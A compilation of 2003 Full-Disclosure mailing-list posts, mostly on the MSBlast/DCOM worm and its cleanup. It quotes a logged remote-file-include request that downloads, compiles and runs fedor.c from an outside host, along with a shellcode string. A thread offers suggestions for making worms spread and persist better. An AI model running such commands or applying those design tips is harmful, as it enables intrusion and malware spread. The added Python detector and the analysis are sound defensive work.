Re: [Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
Actually, the closer I look at c4, I think it might just be sd's bindtty.c, which is part of suckit.

char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";

Dan wrote:

Hi,

Our Snort picked up an interesting attempt to download, compile and execute. Noting also the fact that the sub dir it's attempting to access has not been there for over 4 months (/logjam/)? Has anyone actually seen what this fedor.c is? I have done some googling but it comes up blank. Has anyone else noticed this kind of request recently? Is it just me, or is xfteam.net not resolving anyway?

Original HTTP request:

GET /logjam/showhits.php?rel_path=http://xfteam.net/cmd.txt?cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f

Breaking this down we get (twice):

uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
./f

Regards,
Daniel.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
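A detection-side check for the kind of request Daniel quotes, added here as an example and not code from the thread: it percent-decodes the query string, flags any parameter whose value is a remote URL (the remote file include), follows that URL into its own cmd= query and splits the shell chain into recon / download / compile / execute stages. The sample request is constructed from the one in the post with the duplicated tail dropped; the stage word lists are my own assumption, not anything Snort or the list used.

```python
"""Flag HTTP request lines that carry a remote file include (RFI) whose URL
smuggles a download-compile-execute shell chain, as in the showhits.php
request quoted above. Standard library only; sample input is constructed."""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: the request from the post with the duplicated
# "?cmd=..." tail dropped, plus a benign request for the same script.
MALICIOUS_REQUEST = (
    "GET /logjam/showhits.php?rel_path=http://xfteam.net/cmd.txt?cmd="
    "uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;"
    "gcc%20-o%20f%20fedor.c;./f HTTP/1.0"
)
BENIGN_REQUEST = "GET /logjam/showhits.php?rel_path=templates/default.php HTTP/1.0"

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
SHELL_SEPARATOR = re.compile(r";|&&|\|")
# Rough stage classifiers for the individual commands of a chain (assumed lists).
STAGES = {
    "recon": re.compile(r"^(?:uname|id|whoami|cat\s+/etc/)"),
    "download": re.compile(r"^(?:wget|curl|fetch|lynx)\b"),
    "compile": re.compile(r"^(?:gcc|cc|g\+\+|make)\b"),
    "execute": re.compile(r"^(?:\./|sh\s|bash\s|perl\s|python\s)"),
}


def decode_fully(value, rounds=3):
    """Percent-decode until the value stops changing (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def iter_params(query):
    """Split a query string on '&' *before* decoding, so an encoded '&' inside
    a value cannot break the pair apart; yields (name, decoded value)."""
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        yield unquote(name), decode_fully(value)


def split_commands(chain):
    """Break a shell chain on ';', '&&' and '|' into individual commands."""
    return [c.strip() for c in SHELL_SEPARATOR.split(chain) if c.strip()]


def extract_commands(value):
    """Pull shell commands out of a decoded parameter value. A remote URL is
    followed into its own query string, because RFI payloads usually hand the
    commands to a web shell hosted on the attacker's server (cmd=...)."""
    if REMOTE_URL.match(value):
        commands = []
        for _, inner in iter_params(urlsplit(value).query):
            commands.extend(extract_commands(inner))
        return commands
    if not SHELL_SEPARATOR.search(value):
        return []
    return split_commands(value)


def analyze_request(request_line):
    """Return the remote-include parameter names, the commands found, the
    attack stages those commands belong to, and a one-word verdict."""
    parts = request_line.split()
    if len(parts) < 2:
        return {"remote_includes": [], "commands": [], "stages": [], "verdict": "malformed"}
    query = urlsplit(parts[1]).query
    includes, commands = [], []
    for name, value in iter_params(query):
        if REMOTE_URL.match(value):
            includes.append(name)
        commands.extend(extract_commands(value))
    stages = [s for s, rx in STAGES.items() if any(rx.match(c) for c in commands)]
    if "download" in stages and "execute" in stages:
        verdict = "download-compile-execute chain"
    elif includes:
        verdict = "remote file include"
    elif commands:
        verdict = "command injection"
    else:
        verdict = "clean"
    return {"remote_includes": includes, "commands": commands,
            "stages": stages, "verdict": verdict}


if __name__ == "__main__":
    for line in (MALICIOUS_REQUEST, BENIGN_REQUEST):
        print(analyze_request(line))
```

Splitting on the raw `&` before decoding mirrors what a server does; note that inside an already-decoded inner URL a literal `&&` is no longer distinguishable from a parameter separator.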
RE: [Full-Disclosure] MsBlaster Source?
if ( !MyStartService(szServiceTftpd) ){

Does appear so. Seems like there is more code that's not here.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Jerry Heidtke
Sent: Friday, August 29, 2003 6:59 PM
To: Shanphen Dawa; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] MsBlaster Source?

That's the source to Nachia/Welchia.

-----Original Message-----
From: Shanphen Dawa [mailto:[EMAIL PROTECTED]]
Sent: Friday, August 29, 2003 5:01 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] MsBlaster Source?

Can anyone who is obviously better at coding than I verify the rumours that the following link is the source to msblaster?

https://www.xfocus.net/bbs/index.php?act=STf=1t=26924
RE: [Full-Disclosure] Authorities eye MSBlaster suspect
He'll more likely go to prison for 10-20. That's if he's lucky. I'm certain he will be made an example of. Poor dumb bastard. He wanted attention, now he's got it.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Richard M. Smith
Sent: Friday, August 29, 2003 6:36 PM
To: 'Jerry Heidtke'; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect

The FBI followed the same steps that you outlined to locate Jeffrey Parson, according to his indictment papers. The FBI also got an IP address for Jeffrey which traced back to his house from the hosting service for t33kid.com.

Moral of the story: If you want to be a successful cybercriminal, remember to always hide behind proxy servers and don't use your real name and address when registering a domain name.

If found guilty, I think an appropriate sentence is to make him clean up virus infected computers in public schools for a year.

Richard

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Jerry Heidtke
Sent: Friday, August 29, 2003 4:47 PM
To: the lumpalaya
Cc: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Authorities eye MSBlaster suspect

It looks like it took the FBI 6 days to find what took 10 minutes on Google. Let's see, executable name is teekids.exe, here's a script-kiddie that goes by teekid, he's got a web site called t33kid.com, the whois for the domain gives his real name and address. Enough probable cause to get a warrant right there.

Jerry
RE: [Full-Disclosure] CERT Employee Gets Owned
But seriously, sex with minors isn't exactly a parking ticket.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Kurt Seifried
Sent: Monday, August 25, 2003 6:29 PM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] CERT Employee Gets Owned

Please read the list charter and stop posting junk like this. Do we now post stories about any criminal charges brought against anyone in the security industry? Should we also cover parking tickets?

Kurt Seifried, [EMAIL PROTECTED]
A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/
RE: [Full-Disclosure] JAP back doored
Except the US, we have jurisdiction over the world apparently.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Drew Copley
Sent: Thursday, August 21, 2003 3:50 PM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] JAP back doored

> -----Original Message-----
> From: Florian Weimer [mailto:[EMAIL PROTECTED]]
> Sent: Thursday, August 21, 2003 12:23 PM
> To: Drew Copley
> Cc: [EMAIL PROTECTED]
> Subject: Re: [Full-Disclosure] JAP back doored
>
> Drew Copley [EMAIL PROTECTED] writes:
>
> > Why is the state of Germany trojanizing applications which may be run by anyone on the planet?
>
> Why is the U.S. government interfering with the publication of security advisories if the corresponding software is being run throughout the world?

I haven't had any problem issuing security advisories. What is this in reference to?

Pointing the finger elsewhere does not excuse the fact that the German State has trojanized a popular application which was open to the world to download. And, indeed, the world did download.

Here are some things I do not care if Germany does:

- I don't care if they listen to their own wires
- I don't care if they hack into their own criminals' systems
- I do not care if they use zero day to do this
- I do not even care if they hack into criminals' systems in other countries if they have some jurisdiction in this and are working with other authorities. For instance, if they were hacking into terrorist networks which spanned across the world and were sharing this information, I would not care.

A German cop has no jurisdiction over me. He has no jurisdiction over anyone outside of Germany. This is the same for every country.

> The German government funds the AN.ON project, but allowed for a great deal of independence. Naturally, this independence does not extend to the law, thanks to separation of powers. Now a judge has forced the operators to implement a surveillance interface, which is possible because of a design weakness.
>
> But that's just the beginning of the legal process. The project has announced that it plans to fight, but within the legal system.

This does not absolve them; nothing you can say absolves them.

I realize you have some patriotism here and are speaking from this... But, I also know you do not want the US government to backdoor US applications from US companies without telling you. I know this to be true.

How is it they believe they have a right to trojanize someone outside of Germany?

> Nobody forces you to use the German service if you don't trust the operators or (thanks to recent events) German law enforcement.

That is an empty argument not worth going into.

> > This is blatantly illegal in just about every country outside of Germany. Literally.
>
> No, it isn't. Most countries with communication infrastructure have laws that regulate law enforcement access.

This is not a stupid local law issue. This also is an empty argument. Basically, you are saying if it is discovered the NSA has a backdoor in Windows, that this is okay and no one has a right to complain, even if they are outside of the US. I doubt this would be your case in this situation. I am sure many could say, "Well, this situation is different." No, it is not.

> Let's be honest here. Your country is eavesdropping foreign communication as well.

My country has not installed a trojan on my system, to my own knowledge, all rumors and speculation aside. They have not hacked into my system. As to what wires they listen to, if they listen to their own, that is their business. We have encryption software. If they listen to other people's wires, that is outside of their domain, then yes, this should be illegal. But, is it proven? Does it remove the fact that there are a host of privacy and anonymity tools which we can use?

But, Germany has decided that people don't have a right to use these tools. They have not tried to do even the honorable thing and break these things - which is illegal - but they have secretly trojanized the code. You want me to applaud this? Maybe your nation has just given my own nation some new ideas. Did you help stop this trend?

> > Or, do they believe they are superior to other countries, and they may invade at will?
>
> Please check the facts. Germany doesn't operate an eavesdropping base in the U.S., but the U.S. does in Germany.

I won't even go into that. I do not know what they do there, but their rights have been worked out with the German government. If you have an issue with that, you need to take that up with their government. If my government allowed German police to trojanize an application I ran and my government covered this up... I would be furious at my government first, and at Germany second.

But, none of this is dealing with the matter at hand. These arguments are all a distraction. I have not intended to offend your patriotic sensibilities. My
RE: [Full-Disclosure] DCOM Worm released
Today will go down in history as the day the whole damned world got owned. I have so many machines infected with so many things it's insane. I'll be reverse engineering until 2004.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Dennis Opacki
Sent: Monday, August 11, 2003 5:41 PM
To: Full-Disclosure (E-mail)
Subject: Re: [Full-Disclosure] DCOM Worm released

Can anyone confirm whether the tftp transfers appear to be solely from the hosts listed in the initial sans.org note (which now appear to have been taken down), or is the transfer done from the infecting host?

TIA,
-Dennis

On Mon, 11 Aug 2003, Joey wrote:

> They found a worm, but since it uses tftp servers that can be taken down and since tftp is slow, it shouldn't have much of an effect. Scans sequentially for machines with open port 135, starting at a presumably random IP address - very stupid way to spread!
>
> http://isc.sans.org/diary.html?date=2003-08-11
RE: [Full-Disclosure] Red Bull Worm
Because that movie sucked.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Berend-Jan Wever
Sent: Thursday, August 07, 2003 12:19 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Red Bull Worm

Why not call it SkyNet, after T3?

SkyLined

----- Original Message -----
From: Joel R. Helgeson [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, August 07, 2003 17:53
Subject: [Full-Disclosure] Red Bull Worm

Let's see, the last big worm to exploit Windows was named Code Red after Mountain Dew Code Red was brought to market. Being that this worm is much more effective than Code Red ever was, I say the worm should be named Red Bull, as it is sure to exhibit much more energy than the Code Red worm.

----- Original Message -----
From: Stephen [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Thursday, August 07, 2003 5:25 AM
Subject: [Full-Disclosure] DCOM Worm/scanner/autorooter !!!

Hello here, a new worm is in the wild. It uses the exploit released by k-otik (48 targets - http://www.k-otik.com/exploits/07.30.dcom48.c.php). Look at this shit:

/* RPC DCOM WORM v 2.2
 *
 * This code is in relation to a specific DDOS IRCD botnet project.
 * You may edit the code, and define which ftp to login
 * and which executable file to receive and run.
 * I use spybot, very convenient
 *
 * So basically script kids and brazilian children, this is useless to you

So PATCH PATCH PATCH and block the ports 135 - 139 - 445 - 593

Regards.
Stephen - Germany
RE: [Full-Disclosure] aside: worm vs. worm?
Are you basically saying that MS deserves no sympathy and should stand up and take responsibility for the silliness inherent in their OS source code? If that's what you're saying, then I have to agree. The word debacle comes to mind here.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Darren Reed
Sent: Tuesday, August 12, 2003 4:13 AM
To: Andrew J Homan
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] aside: worm vs. worm?

In some mail from Andrew J Homan, sie said:

> It seems that between the time dcom.c first started popping up around the internet and today, there was ample time for someone to write and release a worm designed to patch infected systems and remove any sign of itself. Given that on the 16th of this month windowsupdate.com will be DDOSed, does anyone else see this as an opportunity for a war of worms with windowsupdate.com at stake? Would anyone consider releasing a patching worm on their own network if they knew it wouldn't spread to the rest of the internet, or is there a downside to this notion which I'm not realizing?

You know, if the DDoS was targeted at someone innocent, I might be more sympathetic towards the problem of a web site being DDoS'd. But it's Microsoft's own web site that is being targeted and it is through their own bug that it is being made possible. As much as they would like to point the finger at others for making the code available to do it, if their software didn't have the bug, it would not be possible at all.

Hrm, I don't really want to start _THAT_ discussion again, but I don't think you will find much, if any, sympathy for Microsoft being targeted by this worm. They're a large, rich, monopoly of a company. Do they really deserve any nice sympathy at all? I suspect I'm not alone in these feelings.

Darren
RE: [Full-Disclosure] aside: worm vs. worm?
I think you are probably missing the obvious privacy issues. However, if this were something that stopped at your edge, then I would refer to it more as an automated patch agent, rather than a worm. It's less threatening. Something like this would be trivial to write, especially if it were to be used in a controlled environment. You should also consider that if it were to only patch machines within your network, that possibly traversal would be unnecessary; a scanner that was capable of patching would do the trick. Even a Perl script to wrap one of the many DCOM exploits available that could tftp the patch to the machine and execute it would probably suffice in most cases, assuming there is a way to make the patch install silently and force a reboot.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Andrew J Homan
Sent: Monday, August 11, 2003 9:55 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] aside: worm vs. worm?

It seems that between the time dcom.c first started popping up around the internet and today, there was ample time for someone to write and release a worm designed to patch infected systems and remove any sign of itself. Given that on the 16th of this month windowsupdate.com will be DDOSed, does anyone else see this as an opportunity for a war of worms with windowsupdate.com at stake? Would anyone consider releasing a patching worm on their own network if they knew it wouldn't spread to the rest of the internet, or is there a downside to this notion which I'm not realizing?

Andrew J. Homan
Software Engineering Intern
http://www.cnt.com/
NOTE: Views and/or opinions expressed are not those of CNT.
RE: Re:::::: [Full-Disclosure] future happenings..
You all focus on a worm's potential for destruction too much. What about threats that affect the real world? For instance, theft of data on a massive scale. We've already seen worms that do this. Or worse, DDOS networks that can be used as weapons against foreign governments or even our own to disrupt or confuse. I think wiping the HDD of a machine is probably too overt and furthermore rather pointless, as it will make it that much harder for the worm to spread once the damage is done. For instance, if the machine reboots, the OS will fail to boot and the worm will fail to go on another run. I'd start looking more towards the blended threat, as Symantec seems to put it, and more advanced tools allowing people to create worms without much technical knowledge. There are a few already out there; I'm certain this will only get worse.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of yossarian
Sent: Tuesday, August 12, 2003 6:14 PM
To: [EMAIL PROTECTED]
Subject: Re: Re:: [Full-Disclosure] future happenings..

Well, basically, any OS on any platform will be vulnerable when people don't upgrade - when people care to write a virus or worm for it. That's why MS is affected - why code for the few BeOS users? They might all three be on holiday and the worm might dud. At least we'll have enough bandwidth then.

Kidding aside - worse worms can be made, and probably will be. It is an arms race. Technically much worse is possible. Wiping HDD is one thing; set track0=bad or reprogramming parts of standard hardware might be worse - like going after a pentium4 processor or the BIOS.

----- Original Message -----
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Sent: Tuesday, August 12, 2003 9:01 PM
Subject: Re:: [Full-Disclosure] future happenings..

> Just reading through how easily this worm (RPC/DCOM/MSBlast) is spreading, and how widespread it is, and the potential number of infected systems - do some of you lot think it's feasible that sometime in the future someone will release a worm that DOES completely wipe the hard disks or do something equally nasty to its host AFTER sending itself on to 'x' recipients?

Let us hope so, as it will be the only way the people will ever learn to stop purchasing this product. Corps and individuals alike will finally see through the charade of this company's code. The purchasing decision makers at Corps have far too long enjoyed the silent kickbacks, the Las Vegas hooker runs financed by the weasel sales teams of the company that churns out this code. The hoodwinking of the IT dept. shall come to an end, when the likes of senior management and even the CEO at the top all can no longer find that kiddie porn they downloaded for their daily wank just the other day.
RE: [Full-Disclosure] smarter dcom worm
Maybe even some polymorphic code and PE injection.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of SPAM
Sent: Wednesday, August 13, 2003 12:56 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] smarter dcom worm

imho netbios and tftp are good enough transport and better than ftp since there would be much more overhead bandwidth with ftp, but should it propagate through emails too that'd be much better.. as most backbone and isp gives high priority to emails... and yes i agree the payload should be more interesting.. such as infecting files and such rather than doing a DDOS... just my $0.02

Ed

----- Original Message -----
From: gml [EMAIL PROTECTED]
To: 'Justin Shin' [EMAIL PROTECTED]; '[EMAIL PROTECTED]' [EMAIL PROTECTED]
Sent: Wednesday, August 13, 2003 6:57 AM
Subject: RE: [Full-Disclosure] smarter dcom worm

I agree with Justin. You would think that by now someone would write a random address generator that would solve the obvious timing problems that most worms seem to suffer from. I was thinking more along the lines of generating a random IP but on the first 3 octets and going through the entire class C. Also, why did this worm carry around a dummy tftp server? NetBIOS is available as a transport method natively in the target OS. Don't get me wrong, NetBIOS isn't the most reliable of network file systems, but it is certainly more lightweight to use this approach than an embedded tftp server. I think it also solves that whole filtering problem to an extent. I am also not trying to encourage; this worm was a serious pain for me this week, as I imagine it was for a lot of people.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Justin Shin
Sent: Tuesday, August 12, 2003 6:32 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] smarter dcom worm

As many people have said, this worm sucks. First of all, look at the host discovery mechanism. Random IP's are so outdated. A better idea? Start with:

1. Subnet (192.168.x.x)
2. WAN Address [for nat's] (24.31.34.x)
3. Incremental WAN (24.31.x.x)

Obviously not a new idea but also not a bad one. I am sure that your average college-level math professor could simplify the host discovery process.

tftp: slow, old, but easy to use. probably straight up ftp would be a better dropping protocol, no?

registry/run is the oldest known startup method. try actually using MULTIPLE startups, like Registry RunServices, RunOnce, RunServicesOnce, AUTOEXEC.BAT, SYSTEM.INI, WIN.INI, WINSTART.BAT, WININIT.INI, CONFIG.SYS ... etc.

once installed, the program should spawn copies of itself, using startup methods, hidden files, fake system exes, etc. it should block out filenames of patches, windowsupdate stuff, fixes, to stop newbies from fixing it.

the worm should also have a more interesting payload -- such as looking at inetpub and htdocs, etc.
RE: [Full-Disclosure] dobble-clicking msblast.exe
I would think it would try to copy itself to %systemroot%\system32, find that it doesn't have access to overwrite msblast.exe, and then just keep executing, but then again.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Nick FitzGerald
Sent: Tuesday, August 12, 2003 11:20 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] dobble-clicking msblast.exe

martin f krafft [EMAIL PROTECTED] wrote:

> Does anyone know what happens if you run msblast.exe on an uninfected system?

It becomes infected and infective.

There is nothing especially magical about the features of the worm program -- run it and it starts trying to spread (or to DoS windowsupdate.com depending on the date). Its function is certainly not affected by the way it gets onto a machine or whether it is launched by the exploit code or not (well, it may depend on some elevated privileges such as those it gets as local system from the RPC exploit code running, as it does, as part of a system service).

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
RE: [Full-Disclosure] smarter dcom worm
I agree with Justin. You would think that by now someone would write a random address generator that would solve the obvious timing problems that most worms seem to suffer from. I was thinking more along the lines of generating a random IP but on the first 3 octets and going through the entire class C. Also, why did this worm carry around a dummy tftp server? NetBIOS is available as a transport method natively in the target OS. Don't get me wrong, NetBIOS isn't the most reliable of network file systems, but it is certainly more lightweight to use this approach than an embedded tftp server. I think it also solves that whole filtering problem to an extent. I am also not trying to encourage; this worm was a serious pain for me this week, as I imagine it was for a lot of people.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Justin Shin
Sent: Tuesday, August 12, 2003 6:32 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] smarter dcom worm

As many people have said, this worm sucks. First of all, look at the host discovery mechanism. Random IP's are so outdated. A better idea? Start with:

1. Subnet (192.168.x.x)
2. WAN Address [for nat's] (24.31.34.x)
3. Incremental WAN (24.31.x.x)

Obviously not a new idea but also not a bad one. I am sure that your average college-level math professor could simplify the host discovery process.

tftp: slow, old, but easy to use. probably straight up ftp would be a better dropping protocol, no?

registry/run is the oldest known startup method. try actually using MULTIPLE startups, like Registry RunServices, RunOnce, RunServicesOnce, AUTOEXEC.BAT, SYSTEM.INI, WIN.INI, WINSTART.BAT, WININIT.INI, CONFIG.SYS ... etc.

once installed, the program should spawn copies of itself, using startup methods, hidden files, fake system exes, etc. it should block out filenames of patches, windowsupdate stuff, fixes, to stop newbies from fixing it.

the worm should also have a more interesting payload -- such as looking at inetpub and htdocs, etc.

note -- i'm not trying to encourage this stuff, i am just pointing out some key flaws in this worm. the next one may have all of these features and much more, because I am not a very creative guy.

-- Justin
RE: [Full-Disclosure] DDoS on the 16th - Fail if no DNS resolution?
_data:004047EC aWindowsupdate_com db 'windowsupdate.com',0

That's what I have.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of northern snowfall
Sent: Wednesday, August 13, 2003 10:10 PM
To: Jason Witty
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] DDoS on the 16th - Fail if no DNS resolution?

> Has anyone tested this worm yet to see what it'll do if you set up an internal DNS entry for windowsupdate.com to point to a black hole address (127.0.0.1 for example) and then set the system clock to be August 16th (this Saturday)? Has anyone taken the time to read the assembly to see if the worm exits if it can't find an IP?

Rather than point windowsupdate.com to 127.1, just force your dns to return lookup failure. If the worm sees an error when it performs a URL lookup, maybe it dies. It wouldn't have *anything* to DoS.

Don
http://www.7f.no-ip.com/~north_
RE: [Full-Disclosure] recent RPC/DCOM worm thought
Why build in a backdoor when you can just write crappy code?

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Kerry Steele
Sent: Wednesday, August 13, 2003 3:20 PM
To: Eichert, Diana; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] recent RPC/DCOM worm thought

Interesting thought, but I would have to say that it really goes deeper than that. If Microsoft were as evil an empire as they are perceived to be, then wouldn't they already have the backdoor to your system to apply the patch anyway? If so, then why go through the pain in the ass to write a shoddy worm and draw bad publicity to the company? Think about the anti-virus companies and, well, every security software product out there, that is racing to be the first to detect or remediate X new variant of the worm. What an opportunity for market traction and visibility, wouldn't you say?

My USD 0.02.

Cheers,
Kerry

-----Original Message-----
From: Eichert, Diana [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, August 13, 2003 7:42 AM
To: '[EMAIL PROTECTED]'
Subject: [Full-Disclosure] recent RPC/DCOM worm thought

I've been thinking about how poorly this worm was written and how it really wasn't very malicious, just very time consuming, forcing people/companies to install patches to their systems. Now here's an alternative thought about it. What if someone purposely wrote this worm to get the attention of people to patch their systems, not to DOS the mickeysoft upgrade site? If they really wanted to create a DOS against a website they wouldn't have postponed it for 4 days. That's a long time in today's world. I mean, if you were mickeysoft and there was a known security hole, wouldn't it be in your best interest to have the first real exploit of it be relatively benign? It gets everyone's attention and they are forced to install the latest security patch.

anyway, my US$.02 worth
RE: [Full-Disclosure] PHRACK 61 IS OUT !
Hah, if it was a Windows box you should have just rooted it. Hahhaha. Sorry, I couldn't resist.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of del
Sent: Tuesday, August 12, 2003 7:44 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] PHRACK 61 IS OUT !

WE'RE SORRY ABOUT THE DELAY, TEAM TESO WAS IN A VERY BAD CAR CRASH :(

Luckily, one member gave us his password in the hospital and we were able to retrieve p61 from his computer and post it!

--
http://phrack.efnet.ru/phrack/

Enjoy.
RE: [Full-Disclosure] what to do
I've been doing this: 1. patch the machine 2. remove registry entries containing msblast.exe 3. reboot 4. remove msblast.exe It's worked out so far. Yes I agree I wish people would listen when you tell them to patch. I have it on good authority that firewalls can't stop stupidity, I guess we're lucky this one wasn't also a mass mailing worm. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Calvyn Sent: Tuesday, August 12, 2003 1:16 AM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] what to do I was just working with my 15 year old niece in NJ, through IM, to help her keep her WinXP PC from rebooting every minute. She had 2 copies of msblast.exe on her PC. One was delete-able, the other we had to reboot into safe mode to delete. After deleting the last exe her unit is NOT rebooting. I have since had her update her unit and disable DCom. Amazing how kids never listen to you when you ask them to update their PCs.. -Calvyn- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of akbara Sent: Tuesday, August 12, 2003 1:52 AM To: Gabe Arnold; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] what to do has she tried booting into safe mode ? then removing the msblast or what not program ? -akbara - Original Message - From: Gabe Arnold [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, August 11, 2003 7:57 PM Subject: Re: [Full-Disclosure] what to do Don't use windose sounds like a solution to me... * Justin Shin ([EMAIL PROTECTED]) wrote: Hi All -- My cousin recently got a nasty RPC/DCOM worm and she cannot use Windows update because when the RPC is shutdown, SYSTEM automatically initiates a shutdown of the computer as you are all aware of. What is the best solution to keep data files intact while removing this worm? I have tried going to the Registry Run, no entries are there besides legitimate startup stuff. Any suggestions? -- Justin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] aside: worm vs. worm?
In fact, you could probably take that kaht2 source and modify it to drop a patch payload instead of a Trojan. Please whatever you do, don't write a worm, we already have enough traffic for the moment ;-) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Andrew J Homan Sent: Monday, August 11, 2003 9:55 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] aside: worm vs. worm? It seems that between the time dcom.c first started popping up around the internet and today, there was ample time for someone to write and release a worm designed to patch infected systems and remove any sign of itself. Given that on the 16th of this month windowsupdate.com will be DDOSed, does anyone else see this as an opportunity for a war of worms with windowsupdate.com at stake? Would anyone consider releasing a patching worm on their own network if they knew it wouldn't spread to the rest of the internet or is there a downside to this notion which I'm not realizing? Andrew J. Homan Software Engineering Intern http://www.cnt.com/ NOTE: Views and/or opinions expressed are not those of CNT. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] east coast powergrid / SCADA [OT?]
Are you saying that Open Source software can save us from power grid cascading failure? Heh, I sure hope they weren't running any GNU software on anything important. Actually I heard that it was a lightning strike in Canada that hit a transformer and overloaded the grid causing the others to break and that's the problem. Maybe it's really Canada aboot to start a war eh? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of KF Sent: Thursday, August 14, 2003 6:54 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] east coast powergrid / SCADA [OT?] Anyone wanna comment on SCADA and the cascading failure that happened today in the north east, like potential for a similar outage from a cyber based attack, etc? Sorry ... I need to read about something other than blaster before I go insane. =] -KF ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Symantec has released an MSBLast removal tool.
It's about damned time, I guess I can stop writing mine now. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ViLLaN Sent: Monday, August 11, 2003 11:06 PM To: '[EMAIL PROTECTED]' Subject: [Full-Disclosure] Symantec has released an MSBLast removal tool. Hey Guys, Symantec has just released a removal tool for MSBLAST. Cheers, Garth S
RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)
